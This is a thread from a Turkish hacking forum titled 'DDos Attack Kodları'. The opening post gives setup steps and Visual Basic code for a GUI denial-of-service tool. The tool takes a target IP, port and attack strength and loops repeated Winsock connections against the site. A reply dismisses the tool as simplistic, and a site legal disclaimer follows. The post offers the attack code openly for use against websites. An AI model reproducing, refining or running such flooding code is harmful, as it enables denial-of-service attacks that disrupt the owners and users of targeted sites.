DDos Attack Kodları

Asosyal TR

Yeni üye
19 May 2018
3
0
Lazım Olanlar: 4textbox,3 Button,1winsock.

Textbox1-Site ip
Textbox2-Saldırı Kuvveti
Textbox3-Saldırı Gücü
Textbox4-Site sunucu portu (normal:80)
###########Winsock Nasıl Ekleriz?#############
google pc nize uygun olan(64,32 bit --Windows 7 falan) mswinsck.ocx diye aratın ve indirin. Örnek: windows 7 64 bit mswinsck.ocx,yazın bulup indirin.
İndirdiğimiz dosyayı c:\windows\system e atın.
Sonra başlat>cmd yönetici olarak çalıştırıp:
regsvr32 c:\windows\system\mswinsck.ocx yazıp enterleyin.
_
Daha sonra visual basic gelip toolbox dan boş yere sağ tıklayıp "choose items" e tıklayın,COM C.... falan diyor ona tıkalyın ordanda http://i.hizliresim.com/pRdYma.jpg resimdekini seçip tamam a tıklayın.

Kod:
Imports System.Net
Imports System.IO
__________________
Button1
MsgBox("Saldırı Başlatıldı")
Dim Wiederholen
Dim Anfragen
On Error Resume Next
For Wiederholen = 0 To FlatTextBox3.Text - 1
For Anfragen = 0 To FlatTextBox2.Text - 1
AxWinsock1.Close()
AxWinsock1.Connect(FlatTextBox1.Text, FlatTextBox4.Text)
Next
Next
End Sub
___________

_____________
Button2
On Error Resume Next
MsgBox("Durdurmakmı İstiyorsunuz ? ", vbYesNo, "DDOS Durdur ! ")
Form1.Show()
Me.Hide()
__________
Button3
Form1.Show()
Me.Hide()
 

ERENAGA

Yeni üye
30 Tem 2016
41
0
dostum güzel bir iş yapmaya çalışıyosun ama "ddos" saldırıları yani network saldırıları bu kadar basit değil ve sadece bunlardan ibaret değil yüksek uploadı olan bi serverda sen ancak modem vurursun bunla eğer ddos saldırıları ve ağ güvenliği konusunda kendini geliştirmek istiyorsan temel networkten tut c++larla yazılan scriptleri su gibi okuman lazım yoksa bunlar çok kalıpsal şeyler her yerde var bunlar
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.